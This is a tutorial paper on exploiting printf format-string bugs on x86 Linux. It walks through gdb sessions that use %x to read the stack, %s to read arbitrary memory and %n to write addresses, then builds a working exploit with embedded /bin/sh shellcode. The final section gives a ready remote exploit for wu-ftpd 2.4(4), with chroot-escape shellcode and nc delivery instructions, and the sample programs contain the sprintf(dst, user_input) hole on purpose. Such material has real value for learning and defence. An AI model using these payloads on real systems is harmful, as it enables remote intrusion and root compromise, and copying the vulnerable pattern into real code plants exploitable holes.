More info on format bugs.
Pascal Bouchareine [ kalou ]
-
I Abstract
This paper tries to explain how to exploit a printf(userinput) format
bug, reported in some recent advisories. The approach is primary, and
more precisely does not take into account any existing exploit (wu-ftpd, ...).
A general knowledge of C programming and assembler is assumed throughout
this article (stack issues, registers, endian storage).
II Playground
Let's begin with an experiment. Have a look at the following code :
void main()
{
char tmp[512];
char buf[512];
while(1) {
memset(buf, '\0', 512);
read(0, buf, 512);
sprintf(tmp, buf);
printf("%s", tmp);
}
}
It allocates a stack for tmp and buf (buf having the lower address
on the stack), reads user input into buf, calls sprintf to fill tmp and
prints out tmp.
Let's try it :
[pb@camel][formats]> ./t
foo-bar
foo-bar
%x %x %x %x
25207825 78252078 a782520 0
Clumsy coders are used to see this kind of things, but let's see exactly
what happens.
When sprintf encounters a conversion string, it simply takes the first pushed
word (32 bits, 4 bytes on intel) on the stack and in the case of "%x"
converter, prints it to screen as hexadecimal.
If arguments are explicitly given, it works well, but if they are missing
and supposing sprintf's stack is empty, the function hits the caller's
stack directly, provided that the stack is growing downward
(intel architecture in the example).
For more details, let's look at this second example:
[pb@camel][formats]> gdb ./t
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
(gdb) break sprintf
Breakpoint 1 at 0x80481f3
(gdb) run
Starting program: /usr/home/pb/code/format/./t
%x
Breakpoint 1, 0x80481f3 in _IO_sprintf ()
(gdb) x/20x $esp
0xbffff670: 0xbffffa80 0x080481af 0xbffff880 0xbffff680
0xbffff680: 0x000a7825 0x00000000 0x00000000 0x00000000
0xbffff690: 0x00000000 0x00000000 0x00000000 0x00000000
* 0xbffffa80 and 0x08481af are a plain stack frame footer
* 0xbffffa80 is the calling function's stack frame address
* 0x08481af is the return address in main().
Then there are two arguments for sprintf :
* 0xbffff880 is tmp[]'s address
* 0xbffff680 is buf[]'s address
Look at what's just after this at address 0xbffff680.
Yep, this is the beginning of main's stack frame, with the 0x400 alloc'ed bytes
for tmp[] and buf[] where there is what have been entered as input:
0x000a7825 (little endian : %x\n).
Let's look at the first example again:
[pb@camel][formats]> ./t
%x %x %x %x
25207825 78252078 a782520 0
The %x converter makes sprintf hit a part of the stack where you have :
"\x25\x78\x20\x25....\x78\x0a\x00\x00\x00\x00"
This is buf[]'s content, with the 0 terminating byte [a word in this case].
Let's study it more in detail, adding a function named do_it, with a
4 bytes stack of 0x04030201, and let's see what happens when sprintf(dst, "%x")
is called from it:
void do_it(char *d, char *s)
{
char buf[] = "\x01\x02\x03\x04";
sprintf(d, s);
}
main()
{
char tmp[512];
char buf[512];
while(1) {
memset(buf, '\0', 512);
read(0, buf, 512);
do_it(tmp, buf);
printf("%s", tmp);
}
}
Of course, sprintf is expected to hit do_it()'s buf[] word, using %#010x as
format converter:
[pb@camel][formats]> ./t
%#010x
0x04030201
So one has access to do_it()'s stack contents, and can guess main()'s
stack frame address, and do_it's return address with ease:
[pb@camel][formats]> ./t
%#010x %x %x %x
0x04030201 bffffa00 bffffac0 80485af
Oh, let's suppose this second pointer (0xbffffa00) is alloc'ed to push
sprintf's argument, but 0xbffffac0 and 0x080485af are really the saved
ebp, return address:
(gdb) bt
#0 0x8048526 in do_it ()
#1 0x80485af in main ()
(gdb) x/2x $ebp
0xbffff6b0: 0xbffffac0 0x080485af
So easily, one has access to the calling function's stack frame address.
In this example, you can easily remotely guess the location of a return
address (main's, for example) to overwrite AND the address of the eggshell
(if any): this is done by adding 0x04 to the caller's saved $ebp (the second
element of this ($ebp, ret) pair is at 0xbffffac0 + 0x04 == 0xbffffac4):
(gdb) x 0xbffffac4
0xbffffac4: 0x080484be
(gdb) bt
#0 0x8048526 in do_it ()
#1 0x80485af in main ()
#2 0x80484be in ___crt_dummy__ ()
So main's return address (#2) is in ___crt_dummy__ for the time being, but can
be changed to anything you want if you can overwrite contents of 0xbffffac4...
And for eggshell address, there are many ways to guess. The simplest way is
to find buf[]'s address, which is [bottom of main's stack] - 0x200 + some
stack allocated informations :
(gdb) break memset
Breakpoint 1 at 0x8048408
(gdb) c
Continuing.
%#010x %x %x %x
0x04030201 bffffa00 bffffa20 80485af
Breakpoint 1, 0x40078428 in memset ()
(gdb) printf "%s\n", 0xbffffa00 - 0x200 + 0x20
%#010x %x %x %x
Although this quite depends on the program you are running, you can
see that methods to find a stack writable return address and a stack
executable eggshell are quite easy.
However, the best way to guess stack architecture remotely, when one
has no access to the running process, is to "eat" the stack with many
"%x" or "%...s" format converters until a [stack address, code segment address]
pair is found and the user input string itself is dumped.
Eating stack space with "junk" format converters until the beginning of input
string is found is a really nice way to control what happens next: you now
have controllable arguments to "%*" format converters, and this really, really
comes in handy. Have a look at this (using the first example) :
[pb@camel][formats]> ./t
AAAA%x
AAAA41414141
Remember, the stack is empty. The %x converter makes sprintf take the
beginning of the input buffer as an arg-list for the format strings.
One has *many* ways to play around with this.
This "let me control the stack" feature is your friend just as gdb is. You can
dump the whole stack, guess stack addresses, and even write to it (as will be
explained later using %n converter).
Let's look at this example :
static char find_me[] = "..Buffer was lost in memory\n";
main()
{
char buf[512];
char tmp[512];
while(1) {
memset(buf, '\0', 512);
read(0, buf, 512);
sprintf(tmp ,buf);
printf("%s", tmp);
}
}
The goal is to print the string find_me[]. In this simple example,
you don't have to search (by %x dummy converters) how many bytes of stack you need to
"eat" before you hit the input buffer: this is the very first one. (the
example with "AAAA%x" showed it quite clearly). So you basically just have to
issue the following "pseudo string" to print out the buffer:
[4 bytes address of find_me]%s
Yes! It is *that* simple: in this case, the input buffer is both the format
string AND the format string argument.. :)
Let's do it simply :
[pb@camel][formats]> printf "\x02\x96\x04\x08%s\n" | ./v
(garbage)Buffer was lost in memory
The garbage is the beginning of the format string. So, you are able to dump
any part of memory you need to. What was true with remote buffer
overflows is not anymore: you dont NEED to seek return address anymore.
You don't need to guess anything, since you can inspect memory to find it.
(Er, this is true with printf() issues, but not when you can't see what the
input produced. See setproctitle() for example.)
Then comes the second (and more funny) part.
III Writing into memory.
All that wouldn't be that funny if we didn't have the "%n" format converter.
This one takes an (int *) argument, and writes the number of bytes written
*so far* to that location.
Let's try this (with the very-simple-AAAA%x proggy again):
[pb@camel][formats]> printf "\x70\xf7\xff\xbf%%n\n" > file
[pb@camel][formats]> gdb ./t
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
(no debugging symbols found)...
(gdb) set args < file
(gdb) break main
Breakpoint 1 at 0x8048529
(gdb) run
Starting program: /usr/home/pb/code/format/./t < file
(no debugging symbols found)...
Breakpoint 1, 0x8048529 in main ()
(gdb) watch *0xbffff770
Hardware watchpoint 2: *3221223280
(gdb) c
Continuing.
Hardware watchpoint 2: *3221223280
Old value = 0
New value = 4
0x400323f3 in vfprintf ()
(gdb) x 0xbffff770
0xbffff770: 0x00000004
This time, 4 bytes encoded into the format string (an address) are written and
the "%n" converter made sprintf report this where it was told to
(i.e. 0xbffff770).
Let's play with this a little more. This time, the generated-file looks like
this:
printf "\x70\xf7\xff\xbf\x71\xf7\xff\xbf%%n%%n" > file
After two watchpoint hits, at 0xbffff770 you have:
(gdb) x 0xbffff770
0xbffff770: 0x00000808
sprintf wrote 8 bytes (two addresses), and "%n" made it report this
to 0xbffff770 and 0xbffff771.
Now, suppose you have an eggshell at 0xbffff710, and the guessed
return address lies at 0xbffffa80. You can't afford to write 0xbffff710
bytes into the buffer to make sprintf (through the "%n" converter) write
this value on the stack. Remember people are usually affraid of buffer
overflows and therefore cut their input buffers :)
But you can use a byte-per-byte construction to build the address.
Since "%n" makes sprintf write the number of bytes written so far on
the stack, you need to substract the number of bytes already written to
each following fragment.
Since the int * thing would erase bytes already written, you have to write
address from the lower significant byte to the higher significant byte.
Since you need to have written 0xff bytes before you can write the 0xbf byte,
and moreover, you can only *increment* the internal number-of-written-bytes
counter, you have to use 0x1bf, erasing a meaningless byte on the stack.
Note that you could use the "%hn" converter, and make sprintf write short int
arguments to the stack. But this won't be discussed here.
Here is the "address builder" code explain so far:
main()
{
char b1[255];
char b2[255];
char b3[255];
memset(b1, 0, 255);
memset(b2, 0, 255);
memset(b3, 0, 255);
memset(b1, '\x90', 0xf7 - 0x10);
memset(b2, '\x90', 0xff - 0xf7);
memset(b3, '\x90', 0x01bf - 0xff);
printf("\x80\xfa\xff\xbf" // arguments to the "%n" converter.
"\x81\xfa\xff\xbf" // ditto
"\x82\xfa\xff\xbf" // ..
"\x83\xfa\xff\xbf" // last byte.
"%%n" // 1) gives 0x10 ( 16 first bytes )
"%s%%n" // 2) gives 0xf7: string len is 0xf7 - 0x10
"%s%%n" // 3) gives 0xff: string len is 0xff - 0xf7
"%s%%n" // 4) gives 0x01bf: string len is 0x01bf - 0xff
,b1, b2, b3);
// you now have 0xbffff710 at 0xbffffa80
}
Let's try it:
(after 3 hits on watchpoint)
(gdb) c
Continuing.
Hardware watchpoint 3: *3221224064
Old value = 16774928
New value = -1073744112
0x400323f3 in vfprintf ()
(gdb) x/2 0xbffffa80
0xbffffa80: 0xbffff710 0xbf000001
Is seems to work quite well. The work is almost finished now, you just
have to push an eggshell after all this format trick, and make the
program jump back in it. Let's try to apply everything said before,
with the following vulnerable program:
IV Sample exploitation.
void do_it(char *dst, char *src)
{
int foo;
char bar;
sprintf(dst, src);
}
main()
{
char buf[512];
char tmp[512];
memset(buf, '\0', 512);
read(0, buf, 512);
do_it(tmp, buf);
printf("%s", tmp);
}
1) First you have to find where's your input buffer, to control the format
string.
[pb@camel][formats]> gcc vuln.c -o v
[pb@camel][formats]> ./v
AAAA %x %c %x
AAAA 0 À bffffac0
(int foo, char bar, stack)
...
AAAA %x %x %x %x %x %x %x %x %x
AAAA 0 bffffac0 bffffac0 804859f bffff6c0 bffff8c0 41414141 62203020 66666666
(the *output* buffer is at offset 28)
Look at the stack frame, which is a (stack addr, code addr) pair: the return
address in main is 0x0804859f, main's stack saved ebp and ret addr begins
at 0xbffffac0.
You now know that main's return address is at 0xbffffac4 (the second part of
the [stack, code] pair is of course at pair + 4).
Then you get some information about main's return address:
printf "AAAA\xc0\xfa\xff\xbf%%x%%x%%x%%x%%x%%x%%x we try %%s\n\n"' | ./v \
| hexdump
0000000 4141 4141 fac0 bfff 6230 6666 6666 6361
0000010 6230 6666 6666 6361 3830 3430 3538 3838
0000020 6662 6666 3666 3063 6662 6666 3866 3063
0000030 3134 3134 3134 3134 7720 2065 7274 2079
0000040 fad4 bfff 84be 0804 0a01 000a
stack/ret is 0xbffffad4/0x080484be (check this with gdb).
Supposing do_it's frame is something like 0x400 bytes before main's frame,
(in fact, it is 0x410 bytes), you can find do_it's stack frame address,
since you know that there must be main's saved frame pointer followed by a
code segment return address, then by main's stack:
after a lot of tries you have:
printf "AAAA\xb0\xf6\xff\xbf%%x%%x%%x%%x%%x%%x%%x we try %%s\n\n"' | ./v \
| hexdump
0000000 4141 4141 f6b0 bfff 6230 6666 6666 6361
0000010 6230 6666 6666 6361 3830 3430 3538 3838
0000020 6662 6666 3666 3063 6662 6666 3866 3063
0000030 3134 3134 3134 3134 7720 2065 7274 2079
0000040 fac0 bfff 8588 0804 f6c0 bfff f8c0 bfff
0000050 4141 4141 f6b0 bfff 6230 6666 6666 6361
0000060 6230 6666 6666 6361 3830 3430 3538 3838
0000070 6662 6666 3666 3063 6662 6666 3866 3063
0000080 3134 3134 3134 3134 7720 2065 7274 2079
0000090 0a0a
(this prints "..we try [contents of 0xbffff6b0])
Bingo! There you have (we try .. is just before offset 0x40)
0xbffffac0,0x08048588 at 0xbffff6b0.
Remember the (stack, code) pair addresses ? This is in fact do_it's stack
frame.
You can see sprintf's args just after: 0xbffff6c0 and 0xbffff8c0. These
are addresses of the two buffers. 0x41414141 is the beginning of the input
buffer, so you can see that hexdump's offset 0x50 is at address 0xbffff6c0,
and since you are good at math, you confirm that hexdump's offset 0x40 is
indeed at 0xbffff6b0.
This process lets you remotely guess
1) stack return address,
2) buffer address.
You have all the information you need to format the stack, so let's get
to the next step: build the eggshell & the appropriate buffer.
The buffer will lie at 0xbffff8c0. BUT, since it is filled with lots of illegal
instructions (i.e. the format converters), the "\x90" string must end with
a "\xeb\x02" to jump over the "%n" format converters, therefore, you need
not worry about the effective egg address.
So all you need to do is to push 4 addresses (one address per byte
of the return address to overwrite), a series of "%x" converters to "eat"
stack space, then a series of nops followed by a "%n" converter (in order
to build the return address) and somewhere the eggshell.
Tough this is not the easiest part, a little brain boost (coffe, cocaine,
coca-cola(tm), anything you like) leads to :
void main()
{
char b1[255];
char b2[255];
char b3[255];
char b4[255];
char xx[600];
int i;
char egg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
// ( (void (*)()) egg)();
memset(b1, 0, 255);
memset(b2, 0, 255);
memset(b3, 0, 255);
memset(b4, 0, 255);
memset(xx, 0, 513);
for (i = 0; i < 12 ; i += 2) { /* setup the 6 "%x" to eat stack space */
strcpy(&xx[i], "%x");
}
memset(b1, '\x90', 0xd0 - 16 - 12 - 2 - 28);
// 16 (4 addresses)
// 2 (%n)
// 40 (%x output - "guess it..")
// use nice formats for
// fixed output size... :)
// + 200- (4 bytes)
memset(b2, '\x90', 0xf8 - 0xd0 - 2); // first 0x90 string is at
// 0xbffff8d0.. (c0 + 4 * 4 bytes) :)
// -2 because of "\xeb\x02"
memset(b3, '\x90', 0xff - 0xf8 - 2); // ditto, with -2.
memset(b4, '\x90', 0x01bf - 0xff - 2); // ditto.
printf("\xb4\xf6\xff\xbf" //
"\xb5\xf6\xff\xbf" // this points to do_it's
"\xb6\xf6\xff\xbf" // return address storage word.
"\xb7\xf6\xff\xbf" //
"%s" // 0) there are 6 "%x", to eat stack until the input buf
// begins to control the format strings.
"%s\xeb\x02%%n" // 1) gives 0xd0 (4 * 4 bytes add, %x are ignored )
"%s\xeb\x02%%n" // 2) gives 0xf9
"%s\xeb\x02%%n" // 3) gives 0xff
"%s\xeb\x02%%n%s" // 4) gives 0x01bf
, xx, b1, b2, b3, b4, egg);
}
Let's give it a final try:
[pb@camel][formats]> ( ./b ; cat ) | ./v
id
uid=1001(pb) gid=100(users) groups=100(users)
date
Sat Jul 15 22:15:07 CEST 2000
.5 Conclusion.
These format bugs are really nasty. First, if you can read the output
of the final buffer (e.g. printf(Userinput)), you obviously have control
over the computer processing it. You have some kind of remote-debugger-access
to the machine, that allows you to get in at the first try. These are bad
news for developpers. (wu-ftpd format bug used by an aware person is
a one-try remote root..).
Playing around format args and pointers allows us to construct some
kind of "generic format string" that will overwrite *certainly* the caller's
return address. This must be coupled with a remote return address
guess to work properly, but gives *at least* the same luck rate as
remote buffer overruns. Even if you don't see what you do (setproctitle),
this is still an easy way to get in.
.6 - garbage & greetings -
This is what I built against my old wu-ftpd [wu-2.4(4)] using
the above technique. It worked, but i had to cut my intput format
string to 512 bytes : I included the eggshell in another part of memory,
using the PASS command. This address is still easy to guess.
/*
* Sample example - part 2: wu-ftpd v2.4(4), exploitation.
*
* usage:
* 1) find the right address location/eggshell location
* this is easy with a little play around %s and hexdump.
* Then, fix this exploit.
*
* 2) (echo "user ftp"; ./exploit; cat) | nc host 21
*
* echo ^[c to clear your screen if needed.
*
* Don't forget 0xff must be escaped with 0xff.
*
*
*/
main()
{
char b1[255];
char b2[255];
char b3[255];
char b4[255];
char xx[600];
int i;
char egg[]= /* Lam3rZ chroot() code */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
"\x43\x89\xd9\x41\xb0\x3f\xcd\x80"
"\xeb\x6b\x5e\x31\xc0\x31"
"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
"\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
"\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
"\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
"\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
"\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";
// ( (void (*)()) egg)();
memset(b1, 0, 255);
memset(b2, 0, 255);
memset(b3, 0, 255);
memset(b4, 0, 255);
memset(xx, 0, 513);
for (i = 0; i < 20 ; i += 2) { /* setup up the 10 %x to eat stack space */
strcpy(&xx[i], "%x");
}
memset(b1, '\x90', 0xa3 - 0x50);
memset(b2, '\x90', 0xfe - 0xa3 - 2);
memset(b3, '\x90', 0xff - 0xfe);
memset(b4, '\x90', 0x01bf - 0xff); // build ret address here.
// i found 0xbffffea3
printf("pass %s@oonanism.com\n", egg);
printf("site exec .."
"\x64\xf9\xff\xff\xbf" // insert ret location there.
"\x65\xf9\xff\xff\xbf" // i had 0xbffff964
"\x66\xf9\xff\xff\xbf"
"\x67\xf9\xff\xff\xbf"
"%s"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s%%n"
"%s%%n\n"
, xx, b1, b2, b3, b4);
}
- many thanks to... ("grep yourself or ignore this part")
The best goes to Ouaou - Ignacy Gawedzki , who drastically
changed this article and made something understandable with it.
My english sucks, he's a babelfish..
Flaoua, my roomy, helped a lot, bearing me, my machines and my monomania.
Try her cookies someday.
Gaius, cleb - I need a beer.
HERT guys, since they own me.
ADM, great, productive work, and with humor, doh.
Michal Zalewski, Solar Designer - they're my heroes.
Enough greetings for such a bad paper, hope you enjoyed it.